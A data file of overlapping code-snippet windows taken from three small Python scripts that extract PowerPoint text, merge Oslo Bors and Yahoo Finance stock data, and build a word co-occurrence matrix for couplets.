[ "shape in slide.shapes: if shape.has_text_frame: print(shape.text_frame.text) if shape.has_table: for cell in shape.table.iter_cells(): print(cell.text)", "for slide in p.slides: for shape in slide.shapes: if shape.has_text_frame: print(shape.text_frame.text) if shape.has_table:", "p = Presentation('a.pptx') for slide in p.slides: for shape in slide.shapes: if shape.has_text_frame:", "Presentation p = Presentation('a.pptx') for slide in p.slides: for shape in slide.shapes: if", "import Presentation p = Presentation('a.pptx') for slide in p.slides: for shape in slide.shapes:", "Presentation('a.pptx') for slide in p.slides: for shape in slide.shapes: if shape.has_text_frame: print(shape.text_frame.text) if", "from pptx import Presentation p = Presentation('a.pptx') for slide in p.slides: for shape", "= Presentation('a.pptx') for slide in p.slides: for shape in slide.shapes: if shape.has_text_frame: print(shape.text_frame.text)", "in p.slides: for shape in slide.shapes: if shape.has_text_frame: print(shape.text_frame.text) if shape.has_table: for cell", "p.slides: for shape in slide.shapes: if shape.has_text_frame: print(shape.text_frame.text) if shape.has_table: for cell in", "slide in p.slides: for shape in slide.shapes: if shape.has_text_frame: print(shape.text_frame.text) if shape.has_table: for", "for shape in slide.shapes: if shape.has_text_frame: print(shape.text_frame.text) if shape.has_table: for cell in shape.table.iter_cells():", "<filename>pythonoffice/ppt_get.py<gh_stars>1-10 from pptx import Presentation p = Presentation('a.pptx') for slide in p.slides: for", "pptx import Presentation p = Presentation('a.pptx') for slide in p.slides: for shape in" ]
[ "the ones # that are not so sparse and that I FEEL makes", "picking the ones # that are not so sparse and that I FEEL", "bors and yahoo data''' import numpy as np import pandas as pd from", "sense to include. df_stats = df_stats[cng.SELECTED_FEATURES] df_combined = pd.merge(df_bors, df_stats, on=cng.MERGE_DFS_ON) df_combined.set_index(cng.MERGE_DFS_ON, inplace=True)", "include. df_stats = df_stats[cng.SELECTED_FEATURES] df_combined = pd.merge(df_bors, df_stats, on=cng.MERGE_DFS_ON) df_combined.set_index(cng.MERGE_DFS_ON, inplace=True) df_combined.to_csv(cng.FINALDATASET_FILENAME) if", "are not so sparse and that I FEEL makes # makes sense to", "merges them to one large dataset. ''' df_bors = pd.read_csv(bors_name) df_stats = pd.read_csv(yahoo_name)", "yahoo_name: str, result_filename: str): ''' Get filenames for csv files from Oslo Bors", "str): ''' Get filenames for csv files from Oslo Bors and Yahoo Finance", "Finance and merges them to one large dataset. ''' df_bors = pd.read_csv(bors_name) df_stats", "df_combined = pd.merge(df_bors, df_stats, on=cng.MERGE_DFS_ON) df_combined.set_index(cng.MERGE_DFS_ON, inplace=True) df_combined.to_csv(cng.FINALDATASET_FILENAME) if __name__ == '__main__': merge_bors_and_yahoo_dfs(cng.BORS_CSV_NAME,", "# Some of the features from Yahoo Finance # are very sparse, so", "''' df_bors = pd.read_csv(bors_name) df_stats = pd.read_csv(yahoo_name) # Some of the features from", "oslo bors and yahoo data''' import numpy as np import pandas as pd", "I FEEL makes # makes sense to include. df_stats = df_stats[cng.SELECTED_FEATURES] df_combined =", "pprint import pprint import scrapeconfig as cng def merge_bors_and_yahoo_dfs(bors_name: str, yahoo_name: str, result_filename:", "to include. df_stats = df_stats[cng.SELECTED_FEATURES] df_combined = pd.merge(df_bors, df_stats, on=cng.MERGE_DFS_ON) df_combined.set_index(cng.MERGE_DFS_ON, inplace=True) df_combined.to_csv(cng.FINALDATASET_FILENAME)", "df_stats = df_stats[cng.SELECTED_FEATURES] df_combined = pd.merge(df_bors, df_stats, on=cng.MERGE_DFS_ON) df_combined.set_index(cng.MERGE_DFS_ON, inplace=True) df_combined.to_csv(cng.FINALDATASET_FILENAME) if __name__", "import pandas as pd from pprint import pprint import scrapeconfig as cng def", "yahoo data''' import numpy as np import pandas as pd from pprint import", "from Yahoo Finance # are very sparse, so here I am picking the", "pd from pprint import pprint import scrapeconfig as cng def merge_bors_and_yahoo_dfs(bors_name: str, yahoo_name:", "'''Combines oslo bors and yahoo data''' import numpy as np import pandas as", "Finance # are very sparse, so here I am picking the ones #", "for csv files from Oslo Bors and Yahoo Finance and merges them to", "Some of the features from Yahoo Finance # are very sparse, so here", "that I FEEL makes # makes sense to include. df_stats = df_stats[cng.SELECTED_FEATURES] df_combined", "of the features from Yahoo Finance # are very sparse, so here I", "merge_bors_and_yahoo_dfs(bors_name: str, yahoo_name: str, result_filename: str): ''' Get filenames for csv files from", "def merge_bors_and_yahoo_dfs(bors_name: str, yahoo_name: str, result_filename: str): ''' Get filenames for csv files", "dataset. ''' df_bors = pd.read_csv(bors_name) df_stats = pd.read_csv(yahoo_name) # Some of the features", "files from Oslo Bors and Yahoo Finance and merges them to one large", "Oslo Bors and Yahoo Finance and merges them to one large dataset. '''", "= pd.read_csv(bors_name) df_stats = pd.read_csv(yahoo_name) # Some of the features from Yahoo Finance", "not so sparse and that I FEEL makes # makes sense to include.", "# makes sense to include. df_stats = df_stats[cng.SELECTED_FEATURES] df_combined = pd.merge(df_bors, df_stats, on=cng.MERGE_DFS_ON)", "here I am picking the ones # that are not so sparse and", "the features from Yahoo Finance # are very sparse, so here I am", "cng def merge_bors_and_yahoo_dfs(bors_name: str, yahoo_name: str, result_filename: str): ''' Get filenames for csv", "import scrapeconfig as cng def merge_bors_and_yahoo_dfs(bors_name: str, yahoo_name: str, result_filename: str): ''' Get", "that are not so sparse and that I FEEL makes # makes sense", "sparse and that I FEEL makes # makes sense to include. df_stats =", "filenames for csv files from Oslo Bors and Yahoo Finance and merges them", "am picking the ones # that are not so sparse and that I", "scrapeconfig as cng def merge_bors_and_yahoo_dfs(bors_name: str, yahoo_name: str, result_filename: str): ''' Get filenames", "df_stats = pd.read_csv(yahoo_name) # Some of the features from Yahoo Finance # are", "makes sense to include. df_stats = df_stats[cng.SELECTED_FEATURES] df_combined = pd.merge(df_bors, df_stats, on=cng.MERGE_DFS_ON) df_combined.set_index(cng.MERGE_DFS_ON,", "str, result_filename: str): ''' Get filenames for csv files from Oslo Bors and", "makes # makes sense to include. df_stats = df_stats[cng.SELECTED_FEATURES] df_combined = pd.merge(df_bors, df_stats,", "import numpy as np import pandas as pd from pprint import pprint import", "data''' import numpy as np import pandas as pd from pprint import pprint", "sparse, so here I am picking the ones # that are not so", "pprint import scrapeconfig as cng def merge_bors_and_yahoo_dfs(bors_name: str, yahoo_name: str, result_filename: str): '''", "as np import pandas as pd from pprint import pprint import scrapeconfig as", "and yahoo data''' import numpy as np import pandas as pd from pprint", "so here I am picking the ones # that are not so sparse", "csv files from Oslo Bors and Yahoo Finance and merges them to one", "pandas as pd from pprint import pprint import scrapeconfig as cng def merge_bors_and_yahoo_dfs(bors_name:", "them to one large dataset. ''' df_bors = pd.read_csv(bors_name) df_stats = pd.read_csv(yahoo_name) #", "numpy as np import pandas as pd from pprint import pprint import scrapeconfig", "and Yahoo Finance and merges them to one large dataset. ''' df_bors =", "from Oslo Bors and Yahoo Finance and merges them to one large dataset.", "so sparse and that I FEEL makes # makes sense to include. df_stats", "np import pandas as pd from pprint import pprint import scrapeconfig as cng", "and that I FEEL makes # makes sense to include. df_stats = df_stats[cng.SELECTED_FEATURES]", "pd.read_csv(bors_name) df_stats = pd.read_csv(yahoo_name) # Some of the features from Yahoo Finance #", "to one large dataset. ''' df_bors = pd.read_csv(bors_name) df_stats = pd.read_csv(yahoo_name) # Some", "result_filename: str): ''' Get filenames for csv files from Oslo Bors and Yahoo", "# that are not so sparse and that I FEEL makes # makes", "''' Get filenames for csv files from Oslo Bors and Yahoo Finance and", "large dataset. ''' df_bors = pd.read_csv(bors_name) df_stats = pd.read_csv(yahoo_name) # Some of the", "Bors and Yahoo Finance and merges them to one large dataset. ''' df_bors", "from pprint import pprint import scrapeconfig as cng def merge_bors_and_yahoo_dfs(bors_name: str, yahoo_name: str,", "df_stats[cng.SELECTED_FEATURES] df_combined = pd.merge(df_bors, df_stats, on=cng.MERGE_DFS_ON) df_combined.set_index(cng.MERGE_DFS_ON, inplace=True) df_combined.to_csv(cng.FINALDATASET_FILENAME) if __name__ == '__main__':", "and merges them to one large dataset. ''' df_bors = pd.read_csv(bors_name) df_stats =", "ones # that are not so sparse and that I FEEL makes #", "are very sparse, so here I am picking the ones # that are", "as pd from pprint import pprint import scrapeconfig as cng def merge_bors_and_yahoo_dfs(bors_name: str,", "Get filenames for csv files from Oslo Bors and Yahoo Finance and merges", "= pd.merge(df_bors, df_stats, on=cng.MERGE_DFS_ON) df_combined.set_index(cng.MERGE_DFS_ON, inplace=True) df_combined.to_csv(cng.FINALDATASET_FILENAME) if __name__ == '__main__': merge_bors_and_yahoo_dfs(cng.BORS_CSV_NAME, cng.YAHOO_CSV_NAME,", "= pd.read_csv(yahoo_name) # Some of the features from Yahoo Finance # are very", "one large dataset. ''' df_bors = pd.read_csv(bors_name) df_stats = pd.read_csv(yahoo_name) # Some of", "pd.merge(df_bors, df_stats, on=cng.MERGE_DFS_ON) df_combined.set_index(cng.MERGE_DFS_ON, inplace=True) df_combined.to_csv(cng.FINALDATASET_FILENAME) if __name__ == '__main__': merge_bors_and_yahoo_dfs(cng.BORS_CSV_NAME, cng.YAHOO_CSV_NAME, cng.FINALDATASET_FILENAME)", "df_bors = pd.read_csv(bors_name) df_stats = pd.read_csv(yahoo_name) # Some of the features from Yahoo", "FEEL makes # makes sense to include. df_stats = df_stats[cng.SELECTED_FEATURES] df_combined = pd.merge(df_bors,", "features from Yahoo Finance # are very sparse, so here I am picking", "import pprint import scrapeconfig as cng def merge_bors_and_yahoo_dfs(bors_name: str, yahoo_name: str, result_filename: str):", "Yahoo Finance # are very sparse, so here I am picking the ones", "# are very sparse, so here I am picking the ones # that", "as cng def merge_bors_and_yahoo_dfs(bors_name: str, yahoo_name: str, result_filename: str): ''' Get filenames for", "= df_stats[cng.SELECTED_FEATURES] df_combined = pd.merge(df_bors, df_stats, on=cng.MERGE_DFS_ON) df_combined.set_index(cng.MERGE_DFS_ON, inplace=True) df_combined.to_csv(cng.FINALDATASET_FILENAME) if __name__ ==", "pd.read_csv(yahoo_name) # Some of the features from Yahoo Finance # are very sparse,", "very sparse, so here I am picking the ones # that are not", "Yahoo Finance and merges them to one large dataset. ''' df_bors = pd.read_csv(bors_name)", "I am picking the ones # that are not so sparse and that", "str, yahoo_name: str, result_filename: str): ''' Get filenames for csv files from Oslo" ]
[ "# print('双字词个数:',shuangzi) # print('其他字词个数:',qita) # for i, (k, v) in enumerate(word_listindex.items()): # if", "matplotlib import fileDispose import numpy as np def get_bench(text,n): \"\"\" get_bench(list,int) 共现矩阵窗口循环的范围,对联选择上下联两句做循环范围 text:文本列表", "import numpy as np def get_bench(text,n): \"\"\" get_bench(list,int) 共现矩阵窗口循环的范围,对联选择上下联两句做循环范围 text:文本列表 n:几句话合并 \"\"\" bench", "word_listindex = fileDispose.getFile('allcut_word_listindex.json') co_occurrence = co_occurrence_matrix_for_word(2,total_list,word_listindex) # fileDispose.writeToFile(co_occurrence.tolist(),'./Data/train/co_occurrence.json') np.savetxt('./Data/train/co_occurrence.txt',co_occurrence) # print(co_occurrence[:,1]) # bench", "re_matrix[i,n] += 1 if(i+j <= len(sentence)): n = int(word_listindex[sentence[i+j-1]]) re_matrix[i,n] += 1 else:", "= 0 for i in range(len(text)): if(i % n == 0): lable =", "if(i-j >= 0): n = int(word_listindex[sentence[i-j]]) re_matrix[i,n] += 1 if(i+j <= len(sentence)): n", "def get_bench(text,n): \"\"\" get_bench(list,int) 共现矩阵窗口循环的范围,对联选择上下联两句做循环范围 text:文本列表 n:几句话合并 \"\"\" bench = [] lable =", "def co_occurrence_matrix_for_word(window,text,word_listindex): re_matrix =np.zeros((len(word_listindex),len(word_listindex)),dtype=int) bench = get_bench(text,2) for sentence in bench: for i", "\"\"\" get_bench(list,int) 共现矩阵窗口循环的范围,对联选择上下联两句做循环范围 text:文本列表 n:几句话合并 \"\"\" bench = [] lable = 0 for", "= get_bench(text,2) for sentence in bench: for i in range(len(sentence)): for j in", "0 for i in range(len(text)): if(i % n == 0): lable = i", "elif (len(word_listindex[k]) == 2): # shuangzi += 1 # else: # qita +=", "if(i % n == 0): lable = i continue else: text[lable].extend(text[i]) bench.append(text[lable]) return", "0 # shuangzi = 0 # qita = 0 # for k in", "np def get_bench(text,n): \"\"\" get_bench(list,int) 共现矩阵窗口循环的范围,对联选择上下联两句做循环范围 text:文本列表 n:几句话合并 \"\"\" bench = [] lable", "sentence in bench: for i in range(len(sentence)): for j in range(1,window+1): if(i-j >=", "return bench def co_occurrence_matrix_for_word(window,text,word_listindex): re_matrix =np.zeros((len(word_listindex),len(word_listindex)),dtype=int) bench = get_bench(text,2) for sentence in bench:", "int(word_listindex[sentence[i+j-1]]) re_matrix[i,n] += 1 else: continue return re_matrix total_list = fileDispose.getFile('total_list.json') word_listindex =", "1 if(i+j <= len(sentence)): n = int(word_listindex[sentence[i+j-1]]) re_matrix[i,n] += 1 else: continue return", "== 2): # shuangzi += 1 # else: # qita += 1 #", "import matplotlib import fileDispose import numpy as np def get_bench(text,n): \"\"\" get_bench(list,int) 共现矩阵窗口循环的范围,对联选择上下联两句做循环范围", ">= 0): n = int(word_listindex[sentence[i-j]]) re_matrix[i,n] += 1 if(i+j <= len(sentence)): n =", "1 # elif (len(word_listindex[k]) == 2): # shuangzi += 1 # else: #", "# for i, (k, v) in enumerate(word_listindex.items()): # if i in range(0, 10):", "j in range(1,window+1): if(i-j >= 0): n = int(word_listindex[sentence[i-j]]) re_matrix[i,n] += 1 if(i+j", "continue else: text[lable].extend(text[i]) bench.append(text[lable]) return bench def co_occurrence_matrix_for_word(window,text,word_listindex): re_matrix =np.zeros((len(word_listindex),len(word_listindex)),dtype=int) bench = get_bench(text,2)", "print(bench[:10]) # danzi = 0 # shuangzi = 0 # qita = 0", "qita = 0 # for k in word_listindex: # if (len(word_listindex[k]) == 1):", "# for k in word_listindex: # if (len(word_listindex[k]) == 1): # danzi +=", "co_occurrence_matrix_for_word(window,text,word_listindex): re_matrix =np.zeros((len(word_listindex),len(word_listindex)),dtype=int) bench = get_bench(text,2) for sentence in bench: for i in", "== 1): # danzi += 1 # elif (len(word_listindex[k]) == 2): # shuangzi", "bench.append(text[lable]) return bench def co_occurrence_matrix_for_word(window,text,word_listindex): re_matrix =np.zeros((len(word_listindex),len(word_listindex)),dtype=int) bench = get_bench(text,2) for sentence in", "get_bench(text,2) for sentence in bench: for i in range(len(sentence)): for j in range(1,window+1):", "# print(bench[:10]) # danzi = 0 # shuangzi = 0 # qita =", "in range(len(text)): if(i % n == 0): lable = i continue else: text[lable].extend(text[i])", "bench = get_bench(text,2) for sentence in bench: for i in range(len(sentence)): for j", "print('双字词个数:',shuangzi) # print('其他字词个数:',qita) # for i, (k, v) in enumerate(word_listindex.items()): # if i", "共现矩阵窗口循环的范围,对联选择上下联两句做循环范围 text:文本列表 n:几句话合并 \"\"\" bench = [] lable = 0 for i in", "range(len(sentence)): for j in range(1,window+1): if(i-j >= 0): n = int(word_listindex[sentence[i-j]]) re_matrix[i,n] +=", "= 0 # qita = 0 # for k in word_listindex: # if", "in range(len(sentence)): for j in range(1,window+1): if(i-j >= 0): n = int(word_listindex[sentence[i-j]]) re_matrix[i,n]", "re_matrix =np.zeros((len(word_listindex),len(word_listindex)),dtype=int) bench = get_bench(text,2) for sentence in bench: for i in range(len(sentence)):", "danzi = 0 # shuangzi = 0 # qita = 0 # for", "1 else: continue return re_matrix total_list = fileDispose.getFile('total_list.json') word_listindex = fileDispose.getFile('allcut_word_listindex.json') co_occurrence =", "print('其他字词个数:',qita) # for i, (k, v) in enumerate(word_listindex.items()): # if i in range(0,", "qita += 1 # print('单个字词个数:',danzi) # print('双字词个数:',shuangzi) # print('其他字词个数:',qita) # for i, (k,", "i in range(len(sentence)): for j in range(1,window+1): if(i-j >= 0): n = int(word_listindex[sentence[i-j]])", "bench = get_bench(total_list,2) # print(bench[:10]) # danzi = 0 # shuangzi = 0", "shuangzi = 0 # qita = 0 # for k in word_listindex: #", "= fileDispose.getFile('allcut_word_listindex.json') co_occurrence = co_occurrence_matrix_for_word(2,total_list,word_listindex) # fileDispose.writeToFile(co_occurrence.tolist(),'./Data/train/co_occurrence.json') np.savetxt('./Data/train/co_occurrence.txt',co_occurrence) # print(co_occurrence[:,1]) # bench =", "continue return re_matrix total_list = fileDispose.getFile('total_list.json') word_listindex = fileDispose.getFile('allcut_word_listindex.json') co_occurrence = co_occurrence_matrix_for_word(2,total_list,word_listindex) #", "return re_matrix total_list = fileDispose.getFile('total_list.json') word_listindex = fileDispose.getFile('allcut_word_listindex.json') co_occurrence = co_occurrence_matrix_for_word(2,total_list,word_listindex) # fileDispose.writeToFile(co_occurrence.tolist(),'./Data/train/co_occurrence.json')", "in range(1,window+1): if(i-j >= 0): n = int(word_listindex[sentence[i-j]]) re_matrix[i,n] += 1 if(i+j <=", "in word_listindex: # if (len(word_listindex[k]) == 1): # danzi += 1 # elif", "bench: for i in range(len(sentence)): for j in range(1,window+1): if(i-j >= 0): n", "# if (len(word_listindex[k]) == 1): # danzi += 1 # elif (len(word_listindex[k]) ==", "1 # else: # qita += 1 # print('单个字词个数:',danzi) # print('双字词个数:',shuangzi) # print('其他字词个数:',qita)", "0): n = int(word_listindex[sentence[i-j]]) re_matrix[i,n] += 1 if(i+j <= len(sentence)): n = int(word_listindex[sentence[i+j-1]])", "fileDispose.getFile('total_list.json') word_listindex = fileDispose.getFile('allcut_word_listindex.json') co_occurrence = co_occurrence_matrix_for_word(2,total_list,word_listindex) # fileDispose.writeToFile(co_occurrence.tolist(),'./Data/train/co_occurrence.json') np.savetxt('./Data/train/co_occurrence.txt',co_occurrence) # print(co_occurrence[:,1]) #", "int(word_listindex[sentence[i-j]]) re_matrix[i,n] += 1 if(i+j <= len(sentence)): n = int(word_listindex[sentence[i+j-1]]) re_matrix[i,n] += 1", "\"\"\" bench = [] lable = 0 for i in range(len(text)): if(i %", "== 0): lable = i continue else: text[lable].extend(text[i]) bench.append(text[lable]) return bench def co_occurrence_matrix_for_word(window,text,word_listindex):", "n == 0): lable = i continue else: text[lable].extend(text[i]) bench.append(text[lable]) return bench def", "as np def get_bench(text,n): \"\"\" get_bench(list,int) 共现矩阵窗口循环的范围,对联选择上下联两句做循环范围 text:文本列表 n:几句话合并 \"\"\" bench = []", "+= 1 # else: # qita += 1 # print('单个字词个数:',danzi) # print('双字词个数:',shuangzi) #", "= get_bench(total_list,2) # print(bench[:10]) # danzi = 0 # shuangzi = 0 #", "1 # print('单个字词个数:',danzi) # print('双字词个数:',shuangzi) # print('其他字词个数:',qita) # for i, (k, v) in", "+= 1 # print('单个字词个数:',danzi) # print('双字词个数:',shuangzi) # print('其他字词个数:',qita) # for i, (k, v)", "= co_occurrence_matrix_for_word(2,total_list,word_listindex) # fileDispose.writeToFile(co_occurrence.tolist(),'./Data/train/co_occurrence.json') np.savetxt('./Data/train/co_occurrence.txt',co_occurrence) # print(co_occurrence[:,1]) # bench = get_bench(total_list,2) # print(bench[:10])", "in bench: for i in range(len(sentence)): for j in range(1,window+1): if(i-j >= 0):", "n = int(word_listindex[sentence[i-j]]) re_matrix[i,n] += 1 if(i+j <= len(sentence)): n = int(word_listindex[sentence[i+j-1]]) re_matrix[i,n]", "= int(word_listindex[sentence[i-j]]) re_matrix[i,n] += 1 if(i+j <= len(sentence)): n = int(word_listindex[sentence[i+j-1]]) re_matrix[i,n] +=", "bench = [] lable = 0 for i in range(len(text)): if(i % n", "for i in range(len(text)): if(i % n == 0): lable = i continue", "1): # danzi += 1 # elif (len(word_listindex[k]) == 2): # shuangzi +=", "0 # for k in word_listindex: # if (len(word_listindex[k]) == 1): # danzi", "i, (k, v) in enumerate(word_listindex.items()): # if i in range(0, 10): # print(k,", "fileDispose.getFile('allcut_word_listindex.json') co_occurrence = co_occurrence_matrix_for_word(2,total_list,word_listindex) # fileDispose.writeToFile(co_occurrence.tolist(),'./Data/train/co_occurrence.json') np.savetxt('./Data/train/co_occurrence.txt',co_occurrence) # print(co_occurrence[:,1]) # bench = get_bench(total_list,2)", "shuangzi += 1 # else: # qita += 1 # print('单个字词个数:',danzi) # print('双字词个数:',shuangzi)", "# danzi = 0 # shuangzi = 0 # qita = 0 #", "# shuangzi = 0 # qita = 0 # for k in word_listindex:", "= 0 # for k in word_listindex: # if (len(word_listindex[k]) == 1): #", "= 0 # shuangzi = 0 # qita = 0 # for k", "danzi += 1 # elif (len(word_listindex[k]) == 2): # shuangzi += 1 #", "range(len(text)): if(i % n == 0): lable = i continue else: text[lable].extend(text[i]) bench.append(text[lable])", "text:文本列表 n:几句话合并 \"\"\" bench = [] lable = 0 for i in range(len(text)):", "lable = i continue else: text[lable].extend(text[i]) bench.append(text[lable]) return bench def co_occurrence_matrix_for_word(window,text,word_listindex): re_matrix =np.zeros((len(word_listindex),len(word_listindex)),dtype=int)", "range(1,window+1): if(i-j >= 0): n = int(word_listindex[sentence[i-j]]) re_matrix[i,n] += 1 if(i+j <= len(sentence)):", "= int(word_listindex[sentence[i+j-1]]) re_matrix[i,n] += 1 else: continue return re_matrix total_list = fileDispose.getFile('total_list.json') word_listindex", "n = int(word_listindex[sentence[i+j-1]]) re_matrix[i,n] += 1 else: continue return re_matrix total_list = fileDispose.getFile('total_list.json')", "# bench = get_bench(total_list,2) # print(bench[:10]) # danzi = 0 # shuangzi =", "for j in range(1,window+1): if(i-j >= 0): n = int(word_listindex[sentence[i-j]]) re_matrix[i,n] += 1", "else: continue return re_matrix total_list = fileDispose.getFile('total_list.json') word_listindex = fileDispose.getFile('allcut_word_listindex.json') co_occurrence = co_occurrence_matrix_for_word(2,total_list,word_listindex)", "n:几句话合并 \"\"\" bench = [] lable = 0 for i in range(len(text)): if(i", "co_occurrence = co_occurrence_matrix_for_word(2,total_list,word_listindex) # fileDispose.writeToFile(co_occurrence.tolist(),'./Data/train/co_occurrence.json') np.savetxt('./Data/train/co_occurrence.txt',co_occurrence) # print(co_occurrence[:,1]) # bench = get_bench(total_list,2) #", "if (len(word_listindex[k]) == 1): # danzi += 1 # elif (len(word_listindex[k]) == 2):", "print('单个字词个数:',danzi) # print('双字词个数:',shuangzi) # print('其他字词个数:',qita) # for i, (k, v) in enumerate(word_listindex.items()): #", "for i, (k, v) in enumerate(word_listindex.items()): # if i in range(0, 10): #", "=np.zeros((len(word_listindex),len(word_listindex)),dtype=int) bench = get_bench(text,2) for sentence in bench: for i in range(len(sentence)): for", "[] lable = 0 for i in range(len(text)): if(i % n == 0):", "k in word_listindex: # if (len(word_listindex[k]) == 1): # danzi += 1 #", "+= 1 else: continue return re_matrix total_list = fileDispose.getFile('total_list.json') word_listindex = fileDispose.getFile('allcut_word_listindex.json') co_occurrence", "lable = 0 for i in range(len(text)): if(i % n == 0): lable", "0 # qita = 0 # for k in word_listindex: # if (len(word_listindex[k])", "i in range(len(text)): if(i % n == 0): lable = i continue else:", "= [] lable = 0 for i in range(len(text)): if(i % n ==", "# danzi += 1 # elif (len(word_listindex[k]) == 2): # shuangzi += 1", "# fileDispose.writeToFile(co_occurrence.tolist(),'./Data/train/co_occurrence.json') np.savetxt('./Data/train/co_occurrence.txt',co_occurrence) # print(co_occurrence[:,1]) # bench = get_bench(total_list,2) # print(bench[:10]) # danzi", "get_bench(total_list,2) # print(bench[:10]) # danzi = 0 # shuangzi = 0 # qita", "# qita = 0 # for k in word_listindex: # if (len(word_listindex[k]) ==", "import fileDispose import numpy as np def get_bench(text,n): \"\"\" get_bench(list,int) 共现矩阵窗口循环的范围,对联选择上下联两句做循环范围 text:文本列表 n:几句话合并", "# print('其他字词个数:',qita) # for i, (k, v) in enumerate(word_listindex.items()): # if i in", "(k, v) in enumerate(word_listindex.items()): # if i in range(0, 10): # print(k, v)", "i continue else: text[lable].extend(text[i]) bench.append(text[lable]) return bench def co_occurrence_matrix_for_word(window,text,word_listindex): re_matrix =np.zeros((len(word_listindex),len(word_listindex)),dtype=int) bench =", "for k in word_listindex: # if (len(word_listindex[k]) == 1): # danzi += 1", "fileDispose import numpy as np def get_bench(text,n): \"\"\" get_bench(list,int) 共现矩阵窗口循环的范围,对联选择上下联两句做循环范围 text:文本列表 n:几句话合并 \"\"\"", "text[lable].extend(text[i]) bench.append(text[lable]) return bench def co_occurrence_matrix_for_word(window,text,word_listindex): re_matrix =np.zeros((len(word_listindex),len(word_listindex)),dtype=int) bench = get_bench(text,2) for sentence", "re_matrix[i,n] += 1 else: continue return re_matrix total_list = fileDispose.getFile('total_list.json') word_listindex = fileDispose.getFile('allcut_word_listindex.json')", "if(i+j <= len(sentence)): n = int(word_listindex[sentence[i+j-1]]) re_matrix[i,n] += 1 else: continue return re_matrix", "(len(word_listindex[k]) == 1): # danzi += 1 # elif (len(word_listindex[k]) == 2): #", "print(co_occurrence[:,1]) # bench = get_bench(total_list,2) # print(bench[:10]) # danzi = 0 # shuangzi", "2): # shuangzi += 1 # else: # qita += 1 # print('单个字词个数:',danzi)", "for sentence in bench: for i in range(len(sentence)): for j in range(1,window+1): if(i-j", "(len(word_listindex[k]) == 2): # shuangzi += 1 # else: # qita += 1", "# shuangzi += 1 # else: # qita += 1 # print('单个字词个数:',danzi) #", "total_list = fileDispose.getFile('total_list.json') word_listindex = fileDispose.getFile('allcut_word_listindex.json') co_occurrence = co_occurrence_matrix_for_word(2,total_list,word_listindex) # fileDispose.writeToFile(co_occurrence.tolist(),'./Data/train/co_occurrence.json') np.savetxt('./Data/train/co_occurrence.txt',co_occurrence) #", "<= len(sentence)): n = int(word_listindex[sentence[i+j-1]]) re_matrix[i,n] += 1 else: continue return re_matrix total_list", "0): lable = i continue else: text[lable].extend(text[i]) bench.append(text[lable]) return bench def co_occurrence_matrix_for_word(window,text,word_listindex): re_matrix", "= fileDispose.getFile('total_list.json') word_listindex = fileDispose.getFile('allcut_word_listindex.json') co_occurrence = co_occurrence_matrix_for_word(2,total_list,word_listindex) # fileDispose.writeToFile(co_occurrence.tolist(),'./Data/train/co_occurrence.json') np.savetxt('./Data/train/co_occurrence.txt',co_occurrence) # print(co_occurrence[:,1])", "+= 1 # elif (len(word_listindex[k]) == 2): # shuangzi += 1 # else:", "= i continue else: text[lable].extend(text[i]) bench.append(text[lable]) return bench def co_occurrence_matrix_for_word(window,text,word_listindex): re_matrix =np.zeros((len(word_listindex),len(word_listindex)),dtype=int) bench", "for i in range(len(sentence)): for j in range(1,window+1): if(i-j >= 0): n =", "# else: # qita += 1 # print('单个字词个数:',danzi) # print('双字词个数:',shuangzi) # print('其他字词个数:',qita) #", "% n == 0): lable = i continue else: text[lable].extend(text[i]) bench.append(text[lable]) return bench", "bench def co_occurrence_matrix_for_word(window,text,word_listindex): re_matrix =np.zeros((len(word_listindex),len(word_listindex)),dtype=int) bench = get_bench(text,2) for sentence in bench: for", "<filename>co-occurrence_matrix.py import matplotlib import fileDispose import numpy as np def get_bench(text,n): \"\"\" get_bench(list,int)", "# print('单个字词个数:',danzi) # print('双字词个数:',shuangzi) # print('其他字词个数:',qita) # for i, (k, v) in enumerate(word_listindex.items()):", "len(sentence)): n = int(word_listindex[sentence[i+j-1]]) re_matrix[i,n] += 1 else: continue return re_matrix total_list =", "# print(co_occurrence[:,1]) # bench = get_bench(total_list,2) # print(bench[:10]) # danzi = 0 #", "else: # qita += 1 # print('单个字词个数:',danzi) # print('双字词个数:',shuangzi) # print('其他字词个数:',qita) # for", "re_matrix total_list = fileDispose.getFile('total_list.json') word_listindex = fileDispose.getFile('allcut_word_listindex.json') co_occurrence = co_occurrence_matrix_for_word(2,total_list,word_listindex) # fileDispose.writeToFile(co_occurrence.tolist(),'./Data/train/co_occurrence.json') np.savetxt('./Data/train/co_occurrence.txt',co_occurrence)", "get_bench(list,int) 共现矩阵窗口循环的范围,对联选择上下联两句做循环范围 text:文本列表 n:几句话合并 \"\"\" bench = [] lable = 0 for i", "+= 1 if(i+j <= len(sentence)): n = int(word_listindex[sentence[i+j-1]]) re_matrix[i,n] += 1 else: continue", "get_bench(text,n): \"\"\" get_bench(list,int) 共现矩阵窗口循环的范围,对联选择上下联两句做循环范围 text:文本列表 n:几句话合并 \"\"\" bench = [] lable = 0", "fileDispose.writeToFile(co_occurrence.tolist(),'./Data/train/co_occurrence.json') np.savetxt('./Data/train/co_occurrence.txt',co_occurrence) # print(co_occurrence[:,1]) # bench = get_bench(total_list,2) # print(bench[:10]) # danzi =", "np.savetxt('./Data/train/co_occurrence.txt',co_occurrence) # print(co_occurrence[:,1]) # bench = get_bench(total_list,2) # print(bench[:10]) # danzi = 0", "# elif (len(word_listindex[k]) == 2): # shuangzi += 1 # else: # qita", "numpy as np def get_bench(text,n): \"\"\" get_bench(list,int) 共现矩阵窗口循环的范围,对联选择上下联两句做循环范围 text:文本列表 n:几句话合并 \"\"\" bench =", "# qita += 1 # print('单个字词个数:',danzi) # print('双字词个数:',shuangzi) # print('其他字词个数:',qita) # for i,", "co_occurrence_matrix_for_word(2,total_list,word_listindex) # fileDispose.writeToFile(co_occurrence.tolist(),'./Data/train/co_occurrence.json') np.savetxt('./Data/train/co_occurrence.txt',co_occurrence) # print(co_occurrence[:,1]) # bench = get_bench(total_list,2) # print(bench[:10]) #", "else: text[lable].extend(text[i]) bench.append(text[lable]) return bench def co_occurrence_matrix_for_word(window,text,word_listindex): re_matrix =np.zeros((len(word_listindex),len(word_listindex)),dtype=int) bench = get_bench(text,2) for", "word_listindex: # if (len(word_listindex[k]) == 1): # danzi += 1 # elif (len(word_listindex[k])" ]
